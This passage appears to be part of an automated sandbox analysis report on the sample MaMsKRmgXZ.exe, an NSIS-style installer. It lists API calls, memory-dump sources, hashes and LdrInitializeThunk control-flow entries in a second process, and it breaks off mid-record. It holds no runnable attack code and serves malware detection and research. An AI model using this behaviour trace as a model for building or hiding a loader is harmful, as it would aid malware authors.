                                                                                                                                      • CreateDialogParamA.USER32(0000006F,00000000,00402CDD,00000000), ref: 00402DAE
                                                                                                                                      • ShowWindow.USER32(00000000,00000005), ref: 00402DBC
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2102729457-0
                                                                                                                                      • Opcode ID: 840a75d409b371d7b77b67c1e1f99b2f4b28fbc1840826de4c71681516a351cc
                                                                                                                                      • Instruction ID: 88e2776c24fdb891b0502b3cf10dbd42b902845c03a9ebe61091678d0ea3e225
                                                                                                                                      • Opcode Fuzzy Hash: 840a75d409b371d7b77b67c1e1f99b2f4b28fbc1840826de4c71681516a351cc
                                                                                                                                      • Instruction Fuzzy Hash: E0F05E75905221ABCA207B62BE4CACA7BA4FB42B527014976F845B31E4C3784C868BDD
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • IsWindowVisible.USER32(?), ref: 004050A4
                                                                                                                                      • CallWindowProcA.USER32(?,?,?,?), ref: 004050F5
                                                                                                                                        • Part of subcall function 004040B4: SendMessageA.USER32(000103F8,00000000,00000000,00000000), ref: 004040C6
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Window$CallMessageProcSendVisible
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3748168415-3916222277
                                                                                                                                      • Opcode ID: add97a0a6925bc22265a7304b998d918bb161013fa4103ebff122d1b57fa8f8b
                                                                                                                                      • Instruction ID: 69794148541a1a4d8d7be296dba567d41b1ee09d4c6a2f8e6d5670bc2f98cc64
                                                                                                                                      • Opcode Fuzzy Hash: add97a0a6925bc22265a7304b998d918bb161013fa4103ebff122d1b57fa8f8b
                                                                                                                                      • Instruction Fuzzy Hash: 3F017171100649ABDF219F11DD80A9F7A65EB84314F208037FA017A2D1D77A9C51DEEA
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00421510,Error launching installer), ref: 004056A2
                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 004056AF
                                                                                                                                      Strings
                                                                                                                                      • Error launching installer, xrefs: 0040568C
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CloseCreateHandleProcess
                                                                                                                                      • String ID: Error launching installer
                                                                                                                                      • API String ID: 3712363035-66219284
                                                                                                                                      • Opcode ID: 0a67d81f0dbc2c48957f366610cafbe47269508c26dde6c53db592e432081f5d
                                                                                                                                      • Instruction ID: 7ab3ce879d7da258620b5dd87dc6aa02706b67d8cc8a7f981bd8ed1ee31a9d30
                                                                                                                                      • Opcode Fuzzy Hash: 0a67d81f0dbc2c48957f366610cafbe47269508c26dde6c53db592e432081f5d
                                                                                                                                      • Instruction Fuzzy Hash: 46E046F0A00209BFEB009B60EC09F7B7AACEB10748F404861BD11F32A0E374A9108A79
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • FreeLibrary.KERNEL32(?,751D3410,00000000,C:\Users\user\AppData\Local\Temp\,0040373A,00403554,?,?,00000006,00000008,0000000A), ref: 0040377C
                                                                                                                                      • GlobalFree.KERNEL32(0067A1D0), ref: 00403783
                                                                                                                                      Strings
                                                                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00403762
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Free$GlobalLibrary
                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                      • API String ID: 1100898210-3355392842
                                                                                                                                      • Opcode ID: c8d1562c69e49bacb52193c1b129ec66577e910d0a26dd744afe86c7ae1d1dec
                                                                                                                                      • Instruction ID: ee514f1fc3f324b596d41214b75e1b85a5e4a54197580a2dff82031d974a72f0
                                                                                                                                      • Opcode Fuzzy Hash: c8d1562c69e49bacb52193c1b129ec66577e910d0a26dd744afe86c7ae1d1dec
                                                                                                                                      • Instruction Fuzzy Hash: 40E0C27380112097C7251F07EC04B5A776CAF45B22F01C02AEC007B3A0C7742C418BD9
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402E30,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\MaMsKRmgXZ.exe,C:\Users\user\Desktop\MaMsKRmgXZ.exe,80000000,00000003), ref: 004059BF
                                                                                                                                      • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402E30,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\MaMsKRmgXZ.exe,C:\Users\user\Desktop\MaMsKRmgXZ.exe,80000000,00000003), ref: 004059CD
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CharPrevlstrlen
                                                                                                                                      • String ID: C:\Users\user\Desktop
                                                                                                                                      • API String ID: 2709904686-3370423016
                                                                                                                                      • Opcode ID: 1c4ce1fe46e37373cead662465a4f3eb2a6c0bdf31f922d28b251b51ad992424
                                                                                                                                      • Instruction ID: a086819795abd80aa1ad59fb022c9920fa60cb9da26d6d2253466900a8022463
                                                                                                                                      • Opcode Fuzzy Hash: 1c4ce1fe46e37373cead662465a4f3eb2a6c0bdf31f922d28b251b51ad992424
                                                                                                                                      • Instruction Fuzzy Hash: 3FD0A7E3408DB05EE70353149C04B9F6A48CF12310F0900A3F180A21A6C67C1C414BFE
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 6EC0115B
                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 6EC011B4
                                                                                                                                      • GlobalFree.KERNEL32(?), ref: 6EC011C7
                                                                                                                                      • GlobalFree.KERNEL32(?), ref: 6EC011F5
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.9908323213.000000006EC01000.00000020.00000001.01000000.00000005.sdmp, Offset: 6EC00000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.9908269121.000000006EC00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9908365679.000000006EC03000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9908406672.000000006EC05000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_6ec00000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Global$Free$Alloc
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1780285237-0
                                                                                                                                      • Opcode ID: 1f20c9794e038696ebe5793e36f564965205845910a23a52df161120f064e5bc
                                                                                                                                      • Instruction ID: d26fce7a722c809bb2ffd46bb309d28669c90af26073492dee5f8e0e0537978a
                                                                                                                                      • Opcode Fuzzy Hash: 1f20c9794e038696ebe5793e36f564965205845910a23a52df161120f064e5bc
                                                                                                                                      • Instruction Fuzzy Hash: EB31B0B1408645AFEB058FEDDA98A66BFFDFB0624CB050419F964D6214E7378E09CB20
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405D33,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405AE8
                                                                                                                                      • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405B00
                                                                                                                                      • CharNextA.USER32(00000000,?,00000000,00405D33,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B11
                                                                                                                                      • lstrlenA.KERNEL32(00000000,?,00000000,00405D33,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B1A
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 190613189-0
                                                                                                                                      • Opcode ID: c17fcd1cf7dd52c707961598001fbe9307a221727c523cbd792ccb3aa3d95fe1
                                                                                                                                      • Instruction ID: 2cbfd0870324320007afb9b70b5ca04d8eb3af27e3ea935175830c0dc6d3898b
                                                                                                                                      • Opcode Fuzzy Hash: c17fcd1cf7dd52c707961598001fbe9307a221727c523cbd792ccb3aa3d95fe1
                                                                                                                                      • Instruction Fuzzy Hash: 50F0C231604414BFC702DBA9DC40D9EBBB8EF46250B2540A6E800F7251D274FE01ABA9
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Execution Graph

                                                                                                                                      Execution Coverage:0%
                                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                                      Signature Coverage:100%
                                                                                                                                      Total number of Nodes:1
                                                                                                                                      Total number of Limit Nodes:0
                                                                                                                                      execution_graph 71174 342229f0 LdrInitializeThunk

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 5 34222c30-34222c3c LdrInitializeThunk
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                      • Opcode ID: f81cd86ce35c8aca916a03d5d90b262aa2dd5c54d6ccd46185b2d3ae125f0d2d
                                                                                                                                      • Instruction ID: f0cd44871970068fc4b327a027b225ad7a8ff39c3e0dc5a1c8613498ef77b022
                                                                                                                                      • Opcode Fuzzy Hash: f81cd86ce35c8aca916a03d5d90b262aa2dd5c54d6ccd46185b2d3ae125f0d2d
                                                                                                                                      • Instruction Fuzzy Hash: 2E90026921300402D5807158550860A009647D1246F91D81AA4007918CC925C86D6321
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 6 34222c50-34222c5c LdrInitializeThunk
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                      • Opcode ID: 21257d2e00e4e76c2e3a2a8a7ba312935bef5f6221b2aec948b6787a8b2a4b84
                                                                                                                                      • Instruction ID: 178d843569fc029430fa7cf53525cac3d78381bd0f4098e02c37d9d0d93a7bb0
                                                                                                                                      • Opcode Fuzzy Hash: 21257d2e00e4e76c2e3a2a8a7ba312935bef5f6221b2aec948b6787a8b2a4b84
                                                                                                                                      • Instruction Fuzzy Hash: AF90026130200403D54071585518606409697E1345F51D416E4406914CD925C85A6222
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 7 34222cf0-34222cfc LdrInitializeThunk
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                      • Opcode ID: bdd3bb986de49ae35a7d71fcb165da5f47241d392f5c6ba6fc107b161785107e
                                                                                                                                      • Instruction ID: 61278306f2be60f212da63de7b49118ca56f5755a4dad4d99769a798a92caed0
                                                                                                                                      • Opcode Fuzzy Hash: bdd3bb986de49ae35a7d71fcb165da5f47241d392f5c6ba6fc107b161785107e
                                                                                                                                      • Instruction Fuzzy Hash: 79900261243045525945B1584504507409757E0285791C417A5406D10CC536D85AE621
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 8 34222d10-34222d1c LdrInitializeThunk
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                      • Opcode ID: 5cf81c87e6ac68fd335941689ab96d95bd03c27f49a118b173b3e1d53239c6a4
                                                                                                                                      • Instruction ID: 68ece3b1da3a6cf4c9ad80dc63d06df6a2b75a722e284a6930f92591f0e357ee
                                                                                                                                      • Opcode Fuzzy Hash: 5cf81c87e6ac68fd335941689ab96d95bd03c27f49a118b173b3e1d53239c6a4
                                                                                                                                      • Instruction Fuzzy Hash: BC90027120200813D51161584604707009A47D0285F91C817A4416918DD666C956B121
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 9 34222da0-34222dac LdrInitializeThunk
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                      • Opcode ID: 7501337093c3b21663d961e92a68e523b3664e00b1fce6fb7f276467d37217e1
                                                                                                                                      • Instruction ID: a6263a3f8aa91b634d0e3414906b88927eab9c83071d8882d312883bd1a7a824
                                                                                                                                      • Opcode Fuzzy Hash: 7501337093c3b21663d961e92a68e523b3664e00b1fce6fb7f276467d37217e1
                                                                                                                                      • Instruction Fuzzy Hash: E590026160200902D50171584504616009B47D0285F91C427A5016915ECA35C996B131
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 10 34222dc0-34222dcc LdrInitializeThunk
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                      • Opcode ID: 8487f019f990c0670e68b0ae4ada4a29d37a35ca3b583222838c889b1e78e0b6
                                                                                                                                      • Instruction ID: b6fd505f5501f54ef904927f9792c3973406b52d9079dd7ef40814bb58b5271d
                                                                                                                                      • Opcode Fuzzy Hash: 8487f019f990c0670e68b0ae4ada4a29d37a35ca3b583222838c889b1e78e0b6
                                                                                                                                      • Instruction Fuzzy Hash: B39002B120200802D54071584504746009647D0345F51C416A9056914EC669CDD97665
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 11 34222e50-34222e5c LdrInitializeThunk
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                      • Opcode ID: e4e543d8a90453afeb0811a02fd93a78e3c1fd28b9a4e82e2982635b6d722e89
                                                                                                                                      • Instruction ID: 2c0150d750098f9924d49359d4eeb972c9f81bf7fe3931bd66352aefecbd2619
                                                                                                                                      • Opcode Fuzzy Hash: e4e543d8a90453afeb0811a02fd93a78e3c1fd28b9a4e82e2982635b6d722e89
                                                                                                                                      • Instruction Fuzzy Hash: 749002A134200842D50061584514B06009687E1345F51C41AE5056914DC629CC567126
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 12 34222eb0-34222ebc LdrInitializeThunk
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                      • Opcode ID: 06d289e466b56222bd3b1ea429c26be681d2a054f347f4f13118d9af4b8155b6
                                                                                                                                      • Instruction ID: a7fdcc7902f904d1b4100360c6fa2c6413d716f509ea2b944e352daf31910ef6
                                                                                                                                      • Opcode Fuzzy Hash: 06d289e466b56222bd3b1ea429c26be681d2a054f347f4f13118d9af4b8155b6
                                                                                                                                      • Instruction Fuzzy Hash: 0A90027120240802D5006158491470B009647D0346F51C416A5156915DC635C8557571
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 13 34222ed0-34222edc LdrInitializeThunk
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
